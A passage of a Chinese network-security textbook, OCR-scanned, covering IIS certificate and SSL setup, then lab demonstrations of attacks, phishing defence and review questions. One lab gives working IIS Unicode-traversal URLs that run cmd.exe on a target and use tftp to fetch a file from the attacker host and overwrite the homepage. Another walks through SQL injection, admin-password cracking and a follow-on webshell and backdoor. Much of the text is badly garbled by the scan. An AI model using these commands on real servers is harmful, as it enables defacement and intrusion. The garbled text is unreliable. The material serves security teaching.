集 必 上 网站 办 估 的 eb, 济 昌 ， 虫 了 闻 件 到 江 天 他 程序 中 光一 企 
证 书 。 通过 使 用 证 书 ， 您 可 以 向 通过 Web 通信 的 人 确认 您 的 身份 
人 


采用 代打 抽 榴 (CA 证 菠 ， 征 书 尾 ， 葡 证 书局 销 
列表 (CRL)， 或 查看 挂 起 的 申请 的 状态 


有 关 证 书 服务 的 详细 信息 ， 请 参 网 应 书 服务 文 慷 . 


图 10-36 “证 书 服务 ”页面 


选择 一 个 证 书 类 型: 
Web 浏览 如 古书 


图 10-37 “证 书 类 型 选择 "页 面 


步骤 3: 单 击 “ 高 级 证 书 申请 ” 超 链接 ,出 现 如 图 10-38 所 示 的 “高 级 证 书 申请 "页面 。 
步骤 4: 有 两 种 高 级 证 书 申请 方法 ,选择 “使 用 base64 编码 的 CMC 或 PKCS #10 文件 
提交 一 个 证 书 申请 .或 使 用 base64 编码 的 PKCS #7 文件 续 订 证 书 申请 ” 超 链接 ,出 现 如 


图 10-39 所 示 的 “提交 证 书 申请 "页面 。 


高 级 证 书 申请 


提交 一 个 证 书 申请 或 续 订 申 请 


ch 1 完全 以 请 的 IE 尖 肥 - 单 击 下 列 选项 之 一 来 : 


要 提交 一 个 保存 的 申请 到 CA， 在 “保存 的 申请 “ 框 中 粘贴 一 个 由 外 部 
源 (t web 服务 器 ) 生 成 的 base-64 编码 的 CIC 或 PECS #10 证 书 申 
请 或 PECS #7 比 订 店 请 . 


Lal ml ml | 


~ 到 | 
而 一 Ll ml nl Lr -| 


图 10-38 “高 级 证 书 申请 "页面 


图 10-39 “提交 证 书 申请 "页面 
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步骤 5: 将 证 书 申请 文件 “C:\certreq. txt” 中 的 全 部 加 密 的 文本 内 容 复 制 到 “保存 的 申 
请 ”文本 框 中 ,然后 单 击 页 面 底 部 的 “提交 ”按钮 ,出 现 如 图 10-40 所 示 的 “成 功 提交 证 书 申 
请 ”页面 。 


您 的 证 书 申请 己 经 收 到 。 但 是 ， 您 必须 等 符 管理 员 颁发 您 申请 的 证 书 。 
您 的 申请 Id 为 2。 

请 在 一 天 或 两 天 内 返回 此 网 站 以 检索 您 的 证 书 。 

注意 : 外 必须 用 此 Web 济 览 者 在 10 天 内 返回 以 检索 您 的 证 书 


[E23 ml ml ml ll Er 
图 10-40 “成 功 提交 证 书 申请 "页面 


四 颁发 Web 服务 器 数字 证 书 。 

步骤 1: 选择 “开始 ”>“ 程 序 ” 一 “管理 工具 ”一 “证 书 颁发 机 构 " 命 令 , 打 开 “ 证 书 颁 发 机 
构 ” 窗 口 。 

步骤 2: 在 左 侧 窗 格 中 ,依次 选择 “证 书 颁发 机 构 ( 本 地 )”>“TKY” 一 “ 挂 起 的 申请 ” 选 
项 , 右 击 右 侧 窗 格 中 的 需 颁发 的 证 书 申请 ,在 弹出 的 快捷 菜单 中 选择 “所 有 任务 ”一 “颁发 " 命 
令 , 如 图 10-41 所 示 。 


文件 E) 多 作 () 可 看 0 帮助 QD 
| 三 | 国 | 日 妨 | 龟 回 
3 


图 10-41 颁发 数字 证 书 


@ 获取 Web 服务 器 数字 证 书 。 

步骤 1: 在 IE 浏览 器 中 再 次 访问 “http://192. 168. 1. 19/certsrv/” 网 址 ,打开 如 
图 10-36 所 示 的 * 证 书 服务 页面。 

步骤 2: 单 击 “ 查 看 挂 起 的 证 书 申请 的 状态 ” 超 链 接 , 出 现 如 图 10-42 所 示 的 “ 挂 起 的 证 
书 申请 ”页 面 , 单 击 “ 保 存 的 申请 证 书 ” 超 链接 ,出 现 如 图 10-43 所 示 的 “证 书 已 颁发 ”页面 , 单 
击 “ 下 载 证 书 ” 超 链接 .将 数字 证 书 保存 到 本 机 上 ,默认 的 数字 证 书 文件 为 certnew. cer。 

回 安装 Web 服务 器 数字 证 书 。 

步骤 1: 再 次 打开 “Internet 信息 服务 (IIS) 管 理 器 ”窗口 . 右 击 “ 默 认 网 站 ”选项 ,在 弹出 
的 快捷 菜单 中 选择 “属性 ”命令 ,打开 “默认 网 站 属性 ”对 话 框 。 
270 


项 目 10 Wb 安 全 


证 书 己 领 发 


您 申请 的 证 书 已 颁发 给 您 。 
DER 编码 或 CBase 64 编码 


图 10-42 “ 挂 起 的 证 书 申请 "页面 图 10-43 “证 书 已 颁发 "页 面 


步骤 2: 在 “日 录 安全 性 ”选项 卡 中 , 单 击 “ 安 全 通信 ”区 域 中 的 “服务 器 证 书 ” 按 钮 ,在 打 
开 的 Web 服务 器 证 书 向 导 的 欢迎 页 面 中 , 单 击 * 下 一 步 按 钮 ,打开 * 挂 起 的 证 书 请 求 " 对 话 
框 ,如 图 10-44 所 示 ,选中 * 处 理 挂 起 的 请 求 并 安装 证 书 ” 单 选 按钮 。 

步骤 3: 单 击 “下 一 步 " 按 钮 ,打开 “处 理 挂 起 的 请 求 ” 对 话 框 ,如 图 10-45 所 示 , 单 击 “ 浏 

览 ?按钮 ,选择 前 面 导出 的 服务 器 证 书 文件 (C:\certnew. cer) 。 


图 10-44 “ 挂 起 的 证 书 请 求 " 对 话 框 10-45 “处 理 挂 起 的 请 求 "对 话 框 


步骤 4: 单 击 * 下 一 步 ” 按 钮 ,打开 “SSL 端口 ?对 话 框 , 如 图 10-46 所 示 ,保留 SSL 端口 默 
认 值 443 不 变 。 

步骤 5: 单 击 “下 一 步 ? 按 钮 ,打开 * 证 书 摘要 ?对话 框 ,如 图 10-47 所 示 ,确认 信息 无 误 后 
单 击 “ 下 一 步 ” 按 钮 ,再 单 击 “ 完 成 "按钮 。 


ee] 本 入 要 
为 此 同室 ssL 册 口 。 PIERRE 


图 10-46 “SSL 端口 ?对 话 框 图 10-47 “证 书 摘要 ”对 话 框 
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@ 在 Web 服务 器 上 设置 SSL。 

步骤 1: 在 “默认 网 站 属性 ?对 话 框 的 目录 安全 性 ?选项 卡 中 , 单 击 * 安 全 通信 ”区 域 中 
的 “查看 证 书 ” 按 钮 ,可 以 查看 安装 在 Web 服务 器 上 的 服务 器 证 书 , 如 图 10-48 所 示 。 如 果 
没有 安装 证 书 , 该 按钮 不 能 被 激活 。 

步骤 2: 启用 SSL 后 的 “默认 网 站 属性 ”对 话 框 的 “网 站 ”选项 卡 如 图 10-49 所 示 ,在 
“SSL 端口 ?文本 框 中 可 以 修改 SSL 端口 值 ,一 般 保持 默认 值 443 不 变 。 

说 明 : 普 通 Web 访问 采用 http 协议 ,启用 SSL 后 的 安全 Web 访问 采用 https 协议 。 


有 效 起 反日 期 2012-04-16 到 2013-04-16 
外 有 一 个 与 该 证 书 对 应 的 冯 角 . 


图 10-48 服务 器 证 书 图 10-49 启用 SSL 后 的 “网 站 ”选项 卡 


步骤 3: 在 “日 录 安 全 性 ”选项 卡 中 , 单 击 “ 安 全 通信 ” 
区 域 中 的 “编辑 "按钮 ,打开 如 图 10-50 所 示 的 “安全 通信 ” 
对 话 框 ,可 以 对 Web 服务 器 和 浏览 器 之 间 的 通信 进行 进 
一 步 的 设置 。 

(3) 客户 端 浏览 器 的 SSL 设置 

Web 服务 器 证 书 可 让 用 户 验 证 服务 器 身份 .如 果 服 
务 器 需要 验证 访问 用 户 的 身份 , 则 需 在 浏览 器 中 申请 并 
安装 数字 证 书 。 

O@ 申请 客户 端 浏览 器 数字 证 书 。 

步骤 1: 在 客户 端的 浏览 器 中 访问 “http://192. 168. ”图 10-50 “安全 通信 ”对 话 框 
1. 19/certsrv/” 网 址 ,出 现 “ 证 书 服务 ”页 面 , 单 击 “申请 一 
个 证 书 ” 超 链接 ,在 “证 书 类 型 选择 ”页 面 中 , 单 击 *Web 浏览 器 证 书 ” 超 链接 。 

步骤 2: 在 如 图 10-51 所 示 的 “识别 信息 ”页 面 中 .按照 自己 的 实际 情况 输入 相关 信息 ， 
然后 单 击 * 提 交 ” 按 钮 。 成 功 提交 浏览 器 数字 证 书 申请 后 的 页 面 如 图 10-52 所 示 。 

@ 获取 并 安装 客户 端 浏览 器 数字 证 书 。 

步骤 1: 待 证 书 颁 发 机 构 颁 发 证 书后 ,在 客户 端 浏览 器 中 访问 “http://192. 168. 1. 19/ 
certsrv/” 网 址 ,在 出 现 的 页 面 中 单 击 “ 查 看 挂 起 的 证 书 申请 的 状态 ” 超 链接 。 

步骤 2: 在 如 图 10-53 所 示 的 页 面 中 ,. 单 击 “Web 浏览 器 证 书 ” 超 链接 ,在 出 现 的 如 
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图 10-54 所 示 的 “证 书 已 颁发 "页 面 中 , 单 击 * 安 装 此 证 书 " 超 链接 ,将 在 浏览 器 上 安装 刚 申请 
的 Web 浏览 器 证 书 。 


立 件 人 枉 缉 全 1 查看 Cg) 由 本 他 工具 上 入 有 屿 on 
Wi 可 | OO" 当 己 
wr 


文件 人 D” 才 错 E) 查看 WD 收 瑟 和 工具 QD 帮助 on 
国 DO 


Web 浏览 善 证 书 - 识别 信息 


要 完成 您 的 证 书 ， 在 下 面 的 框 中 输入 要 求 的 信息 。 
姓名 : [zhangsan 


Fe 
电子 邮件 : hangsarGiIcm 


公司 :REY 
部 门 : ompuer 
市 /县 :Gao 
省 : nang 
国家 (地 区 ): [en 
更 多 寺 项 >> 


-he 但 是 ， 您 必须 等 符 管理 员 颁发 您 申请 


您 的 申请 Id 为 4。 
请 在 一 天 或 两 天 内 返回 此 网 站 以 检索 您 的 证 书 。 
注音: 您 亿 须 用 此 Yeb 仙 虹 如 在 10 天 内 返回 以 检索 他 的 证 书 


图 10-51 “识别 信息 ”页 面 


文件 吕 六 强人) TEL 


查看 挂 起 的 证 书 申请 的 状态 


请 人 和 半 的 UE3 中 放 
sb 浏览 器 证 书 (2012 年 4 月 17 日 18:54:06) 


图 10-53 “证 书 申请 状态 "页面 图 10-54 “证 书 已 颁发 "页 面 


步骤 3: 成 功 安装 Web 浏览 器 证 书后 .出现 如 图 10-55 所 示 的 安装 成 功 页 面 。 

@ 客户 端 浏 览 器 数字 证 书 的 管理 。 

步骤 1: 在 客户 端的 下 浏览 器 中 ,选择 “工具 ”>“Internet 选项 ”命令 ,打开 “Internet 选 
项 ”对 话 框 ,如 图 10-56 所 示 。 

步骤 2: 在 “内 容 ” 选 项 卡 中 , 单 击 * 证 书 ” 按 钮 .打开 “证 书 ” 对 话 框 ,如 图 10-57 所 示 ,在 
“个 人 ?选项 卡 中 列 出 了 颁发 的 个 人 证 书 , 表 明 该 数字 证 书 已 经 安装 到 浏览 器 中 ,用 作客 户 端 
验证 。 

步骤 3: 单 击 * 导 出 ”按钮 可 以 将 数字 证 书 导出 保存 . 单 击 * 导 入 ”按钮 可 以 将 数字 证 书 文 
件 导 入 安装 到 浏览 器 中 : 单 击 “删除 ”按钮 可 以 删除 浏览 器 中 已 经 安装 的 数字 证 书 。 单 击 “ 查 
看 ”按钮 可 以 查看 数字 证 书信 息 。 

@ 在 客户 端 浏览 器 上 设置 SSL。 

默认 情况 下 ,I 下 浏览 器 是 支持 SSL 的 ,不 需要 用 户 进行 设置 。 浏 览 器 是 否 启用 SSL 可 
在 如 图 10-58 所 示 的 “Internet 选项 ”对 话 框 的 “高 级 ”选项 卡 中 进行 设置 。 
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- 加 国 苑 | 记 


[ 六 Mtp: /i92168. 1 19/ certsrv/ eertrapn am 了 El 


10-55 “证 书 已 安装 ”页 面 


图 10-56 “Internet 选项 ”对 话 框 图 10-57 “证 书 ” 对 话 框 


检查 下 载 的 程序 的 签名 
回 启用 集成 ee 身份 验证 (需要 重 局 动 ) 


图 10-58 “高 级 ”选项 卡 
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在 “设置 "列表 框 的 “安全 ”区域 下 有 “使 用 SSL 2. 0” 和 “使 用 SSL 3. 0" 复 选 框 , 其 中 的 数 
字 表 示 版 本 号 。 

@@ 客户 端 访问 SSL 站 点 。 

步骤 1: 在 Web 服务 器 上 ,在 如 图 10-50 所 示 的 “安全 通信 ”对 话 框 中 ,选中 “要 求 安 全 
通道 (SSL)" 复 选 框 ,并 选中 “要 求 客户 端 证 书 ” 单 选 按钮 ,这 样 ,用 户 访问 Web 服务 器 时 要 
求 进行 双向 身份 验证 。 

步骤 2: 在 Web 服务 器 和 客户 端 浏览 器 双方 都 完成 SSL 设置 后 ,在 客户 端 浏览 器 中 访 
间 “http://192.168. 1. 19/certsrv/” 网 址 ,出 现 如 图 10-59 所 示 的 提醒 错误 页 面 。 

步骤 3: 建立 SSL 连接 , URL 网 址 必须 是 以 https 开头 ,在 客户 端 浏览 器 中 访问 
“https://192. 168. 1. 19/certsrv/” 网 址 ,出 现 如 图 10-60 所 示 的 “安全 警报 ”对 话 框 。 


EEE COR Tr [gl 


图 10-59 用 http 访 问 失败 图 10-60 “安全 警报 ?对话 框 


步骤 4: 单 击 “ 是 ”按钮 ,打开 “选择 数字 证 书 ” 对 话 框 ,如 图 10-61 所 示 ,选中 刚刚 安装 的 
客户 端 证 书 。 

步骤 5: 单 击 “ 确 定 ” 按 钮 ,访问 结果 如 图 10-62 所 示 ,能 够 正常 访问 ,在 浏览 器 底部 的 状 
态 栏 中 会 出 现 一 个 锁 形 图 形 息 .表示 浏览 器 和 Web 服务 器 之 间 已 经 建立 起 经 过 SSL 保护 的 
安全 连接 。 此 时 如 果 用 Sniffer 软件 来 嗅 探 传输 的 信息 ,可 以 发 现 经 SSL 加 密 后 的 信息 是 
一 堆 乱 码 。 


使 用 此 网 站 为 你 的 eb 浏览 艾 ， 电 子 邮 件 客户 问 或 其 他 程序 申请 一 
个 证 十。 通过 使 用 证 书 ， 您 可 以 网通 过 Neb 通信 的 人 清 认 纸 的 身 
多 并 且 ， 根 据 您 申请 的 证 书 的 类 型 ,执行 其 他 


您 也 可 以 使 用 此 网 站 下 载 证 书 笑 发 机 构 (cA) 证书， 证书 链 ， 或 证 书 
吊销 列表 (CRL)， 或 查看 挂 起 的 申请 的 杖 态 . 


有 关 证 书 服务 的 详细 信息 ， 请 参阅 证 节 服 务 文 档 - 


图 10-61 “选择 数字 证 书 ” 对 话 框 图 10-62 用 https 访问 成 功 
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10.4.3 任务 3: 利 用 Unicode 漏洞 实现 网 页 “涂鸦 ”的 演示 


1. 任务 目标 


(1) 了 解 Unicode 漏洞 的 危害 性 。 
(2) 了 解 Unicode 漏洞 的 攻击 方法 。 


2. 任务 内 容 


(1) 准备 标语 。 
(2) 探知 远程 Web 服务 器 的 Web 根 日 录 。 
(3) 上 传 覆盖 Web 主页 文件 。 


3. 完成 任务 所 需 的 设备 和 软件 


(1) Windows Server 2000 计算 机 1 台 ( 存 在 Unicode 漏洞 ) ,作为 Web 服务 器 。 
(2) Windows XP/2003 计算 机 1 台 ,作为 客户 端 。 
(3) TFTP 服务 器 软件 1 套 。 


4. 任务 实施 步骤 


以 下 假设 Windows Server 2000 计算 机 的 IP 地 址 为 192. 168. 1. 102 ,并 已 开启 IIS 服 
务 ,作为 远程 Web 服务 器 。 假 设 客户 端 计算 机 的 IP 地 址 为 192. 168. 1. 101 。 

(1) 准备 标语 

在 客户 端 计算 机 上 用 网 页 设计 软件 (如 FrontPage) 制 作 一 个 标语 网 页 ,保存 为 1. htm， 
作为 “涂鸦 "主页 ,内 容 任意 。 

(2) 探知 远程 Web 服务 器 的 Web 根 日 录 

首先 查找 要 修改 的 Web 服务 器 上 的 主页 文件 保存 在 哪里 。 利 用 Unicode 漏洞 找 出 
Web 根 目录 的 路 径 。 用 查找 文件 的 方法 找到 远程 Web 服务 器 的 Web 根 目录 。 

步骤 1: 在 客户 端正 浏览 器 中 输入 “http://192. 168. 1. 102/scripts/.. %c0%2f../ 
windows/system32/cmd. exe?/c 十 dir 十 c:\mmc. gif/s”。 

如 果 服 务 器 端 操 作 系 统 的 安装 目录 是 winnt, 把 上 面 的 windows 改 成 winnt。“/s” 参 数 
加 在 dir 命令 后 表示 查找 指定 文件 或 文件 夹 的 物理 路 径 . 所 以 “dir 十 c:\mmc. gif/s” 表 示 在 
远程 Web 服务 器 的 C 盘 中 查找 mmc. gif 文件 。 由 于 文件 mmc. gif 默认 安装 在 Web 根 日 
录 中 ,所 以 在 找到 该 文件 的 同时 ,也 就 找到 了 Web 根 目 录 (c:\Inetpub\ wwwroot)， 
如 图 10-63 所 示 。 

步骤 2: 在 客户 端 正 地 址 栏 中 输入 “http://192. 168. 1. 102/scripts/.. %c0%2f../ 
windows/system32/cmd. exe?/c 十 dir 十 c:\inetpub\wwwroot”, 图 10-64 显示 了 Web 根 日 
录 (c:\inetpub\wwwroot) 下 的 文件 和 文件 夹 。 

通常 主页 的 文件 名 一 般 是 index. htm, index. html、 default. asp、 default. htm 等 ,由 
图 10-64 可 知 ,远程 Web 服务 器 的 主页 文件 是 index. htm。 因 此 ,此 时 只 需要 将 标语 文件 
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文件 四 闹 辑 区) 坦 看 WJ 收 庆 &) 工具 0D) 帮助 
:日 国 国 内 有时 次 ex 如 全 :学 回 - 恒 乍 
加 图 wew /ee Io ti00/sarints/ vom Jinims/ rem/ er/odirte we o/s | 加 Wl 这 


Directory o 


1999-06-03 23:13 356 mmc. gif 
1 File(s) 356 bytes 


Directory of c:\Inetpub\wwwroot\_wti_enf 


2012-04-06 09:58 344 mac. if 
1 File(s) 344 bytes 


Total Files Listed; 
2 File(s) 700 bytes 
0 Dir(z) 。 6, 882, 193, 408 bytes free 


马 httpz//192. 168.1. 102/acript 

文件 如 国 查 站 ) 查看 0D 收藏 4) 工具 四 帮助 只 

Ba- 日 国 国 的 Pe 认 ex 右 从 - 避 加 -上品 乍 

入 直 四 [图 netp /lse 1691102/seripts/_ ee /rindora/syates3t/cad enty/ctdirte- \inetpob\reeroot 国 | 加] 和 到 耽 扩 
加 


Directory of c+\inetpub\wwroot 


2012-05-10 23:30 IR 
2012-05-10 23+ TD 二 
1999-06-03 342 help. eif 
1999-12-16 

2012-04-06 

2012-05-10 

1999-12-16 

1999-06-03 

1999-06-03 

2012-04-06 

1999-06-03 

1999-06-03 

1999-06-03 

1999-06-03 

2012-04-06 

2012-04-06 

2012-04-06 


ED 


图 10-64 Web 根 目录 的 文件 和 文件 夹 


(3) 上 传 覆盖 Web 主页 文件 

步骤 1: 在 客户 端 运行 TFTP 服务 器 软件 (Tftpd32. exe) ,此 时 不 需要 做 任何 设置 ,只 要 
把 1. htm 文件 拷贝 到 TFTP 服务 器 的 路 径 下 ,通过 tftp 命令 就 能 将 1. htm 文件 下 载 到 远程 
Web 服务 器 上 。 

步骤 2: 在 客户 端正 地 址 栏 中 输入 “http://192. 168. 1. 102/scripts/.. %c0%2{../ 
windows/system32/cmd. exe? /c+ tftp++ 192. 168. 1. 101 十 get 十 1. htm+t ce:\inetpub\ 
wwwroot\index. htm”, 表示 执行 tftp 命令 覆盖 远程 Web 服务 器 上 的 主页 文件 ,结果 如 
图 10-65 所 示 ,已 经 完成 下 载 文件 的 任务 。 

步骤 3: 重新 访问 远程 Web 网 站 , 即 在 客户 端 正 地 址 栏 中 输入 “http://192. 168. 1. 102”， 
即 可 看 到 刚才 下 载 到 Web 服务 器 上 的 标语 文件 .如 图 10-66 所 示 ,… 涂鸦 主页 成 功 。 如 果 
不 能 出 现 如 图 10-66 所 示 的 结果 ,可 能 是 因为 没有 修改 权限 ,添加 修改 权限 后 ,可 成 功 “ 涂 
鸦 ” 主 页 。 
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汝 这 是 被 涂 欧 的 网 页 - Wicrosoft In--- 车 | 后 

文件 中 纺 竹 @)， 查看 W 收 辣 Q) I 上 WD ” 诗 
Oa-© -BEG Pm “ 
起 让 四) | 竹 htp://192.169.1 102/ 。” 国 | 加 轩 到 这 


CGI Error 这 是 被 涂鸦 的 网 页 


The 车 全 rd COl soolicntion nisbehored by not rotwning © colete 
of headers. The headers it did r 


图 10-65 上 传 覆盖 主页 文件 图 10-66 “涂鸦 "后 的 主页 


10.4.4 任务 4: 利 用 SQL 注入 漏洞 实现 网 站 入 侵 的 演示 


1. 任务 目标 


(1) 了 解 SQL 注入 漏洞 的 危害 性 。 
(2) 了 解 SQL 注入 漏洞 的 攻击 方法 。 


2. 完成 任务 所 需 的 设备 和 软件 


(1) Windows XP/2003 计算 机 1 台 。 
(2) 存在 SQL 注入 漏洞 的 网 站 1 个 。 
(3) 旁 注 Web 综合 检测 程序 1 套 。 
(4) MD5 破解 工具 软件 1 套 。 


3. 任务 实施 步骤 


步骤 1: 下 载 并 运行 旁 注 Web 综合 检测 程序 ,选择 "SQL 注入 ”选项 卡 ,在 “批量 扫描 注 
入 点 "页面 中 , 单 击 “ 添 加 网 址 ”按钮 ,在 弹出 的 “添加 检测 网 址 ”对 话 框 中 添加 可 能 存在 SQL 
注入 漏洞 的 网 址 ,如 图 10-67 所 示 。 

步骤 2: 单 击 “*OK" 按 钮 后 .再 单 击 “ 批 量 分 析 注 入 点 ”按钮 ,扫描 出 该 网 站 的 所 有 注入 

点 一 一 SQL 漏洞 .如 图 10-68 所 示 。 

步骤 3: 在 图 10-68 中 选择 其 中 的 一 个 注入 地 址 ,并 将 其 复制 到 “SQL 注入 猜 解 检测 ”页 
面 中 的 “注入 点 ”文本 框 中 。 单 击 * 开 始 检测 ”按钮 ,检测 该 URL 是 否 可 以 进行 注入 ,如 
图 10-69 所 示 。 

步骤 4: 如 果 该 URL 可 以 进行 注入 , 则 依次 单 击 * 猜 解 表 名 ”“ 猜 解 列 名 ”>“ 猜 解 内 容 ” 
按钮 进行 数据 库 表 名 、 列 名 和 字段 内 容 的 猜 解 ,如 图 10-70 所 示 。 

步骤 5: 从 图 10-70 中 可 以 知道 , 表 admin 中 有 username 列 和 password 列 , 还 知道 
admin 账号 (很 可 能 是 管理 员 的 账号 ) 密 码 的 MD5 值 为 7bb53d42febec5f8 。 

步骤 6: 接 下 来 需要 找 出 该 网 站 的 管理 入 口 。 切 换 到 “管理 入 口 扫 描 ” 页 面 , 单 击 “ 扫 描 
后 台地 址 ”按钮 ,可 以 得 到 如 图 10-71 所 示 的 网 站 管理 入 口 地 址 。 
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连接 地 址 ; 


图 10-67 添加 检测 网 址 
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图 10-68 扫描 SQL 注入 点 
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©O heeess 


© heeess 


图 10-70 猜 解数 据 库 的 表 名 、 列 名 和 字段 内 容 
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加 三 解 T 具 “ 阅 铺 助 T 具 “多 关 于 程序 


: [http- /ree or /vi ernes sp7i 436698t 
加 从 当前 目录 开始 扫 葡 。” 〇 从 主机 地 址 开始 扫描 。 设置 线程 
已 检测 演 接 ;99 条 
tp rr 
http: /mm EE or: 
et /7 


图 10-71 获取 网 站 的 管理 入 口 地 址 


步骤 7: 可 以 通过 尝试 ,最 终 找 出 在 获取 的 地 址 中 到 底 哪 一 个 才 是 真正 的 网 站 管理 
地 址 。 

步骤 8: 最 后 ,要 破解 经 过 加 密 的 管理 员 账 号 admin 的 密码 。 可 以 通过 MD5 破解 工具 
〈 详 见 5.4. 1 节 的 内 容 ) 或 者 MD5 破解 网 站 来 实现 。 

步骤 9: 有 了 网 站 的 管理 入口 地 址 和 管理 员 的 账号 .密码 之 后 , 即 可 登录 网 站 的 管理 页 
面 进行 管理 。 至 此 ,一 次 SQL 注入 成 功 。 

步骤 10: SQL 成 功 注 入 后 ,可 以 通过 多 种 方式 对 Web 服务 器 进行 攻击 。 例 如 ,在 Web 
网 站 管理 中 找 出 ASP 上 传 的 漏洞 .上 传 ASP 木马 和 Webshell 来 获取 服务 器 的 账户 和 密 
码 。 然 后 ,通过 远程 登录 进入 服务 器 ,并 在 服务 器 上 植 入 灰 蚀 子 等 木马 程序 , 留 下 后 门 以 便 
下 次 进入 。 


105 拓展 提高 : 防范 网 络 钓鱼 


1. 什么 是 网 络 钓鱼 


网 络 钓 色 (Phishing) 是 诈骗 者 利用 欺骗 性 的 电子 邮件 和 伪造 的 Web 站 点 (钓鱼 网 站 ) 

来 进行 网 络 诈骗 活动 .诱骗 访问 者 提供 一 些 私人 信息 .受骗 者 往往 会 泄露 自己 的 私人 资料 ， 

如 用 户 名 、 信 用 卡号 码 .银行 卡 账户 .身份 证 号 码 等 内 容 。 钓 鱼网 站 是 设置 一 个 以 假 乱 真 的 
假 网 站 .欺骗 网 络 浏览 者 上 当 ,链接 进入 假冒 网 站 木马 程序 趁机 植 和 人 用户 的 计算 机 。 

网 络 钓鱼 一 词 .是 由 Fishing 和 Phone 组 合 而 成 .由 于 黑客 始祖 起 初 是 用 电话 作案 ,所 
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以 用 Ph 来 取代 下 ,创造 了 Phishing,Phishing 发 音 与 Fishing 相同 .“ 网 络 钓鱼 "就 其 本 身 来 
说 , 称 不 上 是 一 种 独立 的 攻击 手段 ,更 多 的 只 是 诈骗 方法 ,就 像 现 实 社会 中 的 一 些 诈骗 一 样 。 


曾 出 现 过 的 某 假冒 银行 网 站 ,网址 为 http://www. lcbc. com. cn, 而 真正 银行 网 站 是 


http://www.icbc. com. cn, 犯 罪 分 子 利 用 数字 1 和 字母 i 非常 相近 的 特点 企图 蒙 珊 粗心 的 
用 户 。 


2. 网 络 钓鱼 的 防范 


针对 网 络 钓鱼 的 威胁 ,主要 有 以 下 几 个 防范 技巧 。 

@ 直接 输入 域名 ,避免 直接 点 击 不 法 分 于 提供 的 相似 域名 。 

@ 不 要 打开 陌生 人 的 电子 邮件 ,这 很 有 可 能 是 别有用心 者 精心 营造 的 。 

@ 不 要 直接 用 键盘 输入 密码 ,而 是 改 用 软 键盘 。 

@ 安装 杀毒 软件 并 及 时 升级 病毒 知识 库 和 操作 系统 补丁 ,尤其 是 反 钓鱼 的 安全 工具 。 
@ 针对 银行 账号 ,要 利用 数字 证 书 来 对 交易 进行 加 密 。 

@ 登录 银行 网 站 前 ,要 留意 浏览 器 地 址 栏 ,如 果 发 现 网 页 地 址 不 能 修改 ,最 小 化 IE 窗 


口 后 仍 可 看 到 浮 在 桌面 上 的 网 页 地 址 等 现象 ,要 立即 关闭 正 窗口 ,以 免 账号 密码 等 被 盗 。 


有 关 专 家 建议 网 民 在 网 上 购物 时 需 提 高 警惕 ,不 要 轻信 交易 对 方 以 低 价 或 其 他 理由 发 


送 的 站 外 商品 页 面 、 付 款 页 面 , 妥 善 保管 好 自己 的 网 络 账号 和 密码 ,经 常 升级 防 病毒 软件 , 提 
高 计算 机 的 安全 性 。 此 外 ,通过 第 三 方 支付 平台 进行 交易 时 ,安装 必要 的 数字 证 书 和 安全 控 
件 , 可 充分 保障 你 的 账户 与 资金 免 受 木马 和 网 络 钓鱼 的 威胁 。 
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一 、 选 择 题 
1. 在 建立 网 站 的 目录 结构 时 ,最 好 的 做 法 是 
A. 将 所 有 的 文件 最 好 都 放 在 根 目录 下 B. 目录 层次 选 在 3 一 5 层 


C. 按 栏 日 内 容 建立 子 日 录 D. 最 好 使 用 中 文 日 录 
去 是 网 络 通信 中 标志 通信 各 方 身份 信息 的 一 系列 数据 ,提供 一 种 在 Internet 
上 验证 身份 的 方式 。 
A. 数字 认证 B. 数字 证 书 C. 电子 认证 D. 电子 证 书 
3. 提高 下 浏览 器 安全 性 的 措施 不 包括 s 
A. 禁止 使 用 Cookies B. 禁止 ActiveX 控件 
C. 禁止 使 用 Java 及 活动 脚本 D. 禁止 访问 国外 网 站 


4. 创建 Web 虚拟 目录 的 用 途 是 
A. 用 来 模拟 主 目录 的 假 文件 夹 
B. 用 一 个 假 的 目录 来 避免 感染 病毒 
C. 以 一 个 固定 的 别名 来 指向 实际 的 路 径 . 当 主 目录 改变 时 .相对 用 户 而 言 是 不 变 的 
D. 以 上 都 不 对 
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5. HTTPS 是 使 用 以 下 协议 。 
A. SSH B. SET C. SSL D. TCP 

二 、 填空 题 

1. 在 IIS 6.0 中 ,提供 的 登录 身份 认证 方式 有 4 种 ,还 可 以 通过 安全 机 制 建立 
用 户 和 Web 服务 器 之 间 的 加 密 通 信 通 道 ,确保 所 传递 信息 的 安全 性 ,这 是 一 种 安全 性 更 高 
的 身份 认证 方式 。 

2. IE 浏览 器 定义 了 4 种 访问 Internet 的 安全 级 别 , 从 高 到 低 分 别 是 

和 ;另外 ,提供 了 和 

4 种 访问 对 象 。 用 户 可 以 根据 需要 ,对 不 同 的 访问 对 象 设置 不 同 的 安全 级 别 。 

3. IIS 的 安全 性 设置 主要 包括 和 

4. Web 目录 访问 权限 包括 


和 
5，Web 站 点 的 默认 端口 号 是 ;FTP 站 点 的 默认 端口 号 是 ,SMTP 服 
务 的 默认 端口 号 是 
三 、 简 答题 
.Web 站 点 的 安全 问题 主要 表现 在 哪 几 个 方面 ? 
. IIS 的 安全 设置 包括 哪些 方面 ? 
. 什么 是 CGI? CGI 程序 可 能 以 什么 方式 产生 安全 漏洞 ? 
. 什么 是 ASP? 有 哪些 常见 的 安全 漏洞 ? 
. 什么 是 SQL 注入 ? SQL 注入 的 基本 步骤 一 般 有 哪些 ? 
.Cookie 对 用 户 计算 机 系统 会 产生 伤害 吗 ? 为 什么 说 Cookie 的 存在 对 个 人 隐私 是 一 
种 潜在 的 威胁 ? 
7. 在 I 下 中 如 何 设 置 Cookie、ActiveX 和 Java 的 安全 性 ? 


oO own 
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111 项 目 提 出 


张 先生 家 中 有 多 台 计 算 机 ,包括 台式 计算 机 和 笔记 本 电脑 ,为 了 实现 这 些 计 算 机 能 共享 
宽带 上 网 ,并 实现 无 线 连 接 , 张 先生 添置 了 一 台 无 线路 由 器 来 实现 这 些 目标 。 最 近 , 张 先生 
发 觉 上 网 速度 突然 变 得 很 慢 ,为 此 他 疑惑 不 解 ,因为 张 先生 的 无 线路 由 器 明明 设置 过 密码 ， 
应 该 不 会 被 其 他 人 盗用 网 络 。 

后 来 ,经 朋友 检查 发 现 , 张 先生 的 计算 机 的 “网 上 邻居 ”中 突然 多 出 一 个 陌生 的 计算 机 用 
户 , 网 络 被 次 用 已 经 成 为 不 争 的 事实 。 朋 友 告 诉 他 ,他 的 无 线 网 络 已 经 被 一 种 称 为 “ 足 网 卡 ” 
